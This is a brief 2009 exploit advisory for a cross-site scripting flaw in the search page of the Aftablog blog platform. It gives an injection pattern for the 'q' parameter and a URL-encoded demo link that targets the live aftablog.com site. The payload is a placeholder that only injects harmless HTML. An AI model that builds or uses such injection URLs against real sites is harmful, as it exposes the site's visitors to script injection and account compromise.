Aftablog (search) XSS vulnerability
		Author : Secanar
	    Email : Secanar[at]gmail.com
		Date : Mondey,August03,2009
		-----------------------------------
		Exploit :
		http://site/search/?q='' ,<a></a>[HTML Code or XSS]->> ((Decode ACSII to Hex))
		or inject '' ,<a></a>[HTML Code or XSS] to search tags
		Demo :
		http://www.aftablog.com/search/?q=%27%27+%2C%3Ca%3E%3C%2Fa%3E%3Cinput%3E%3C%2Finput%3E
		-----------------------------------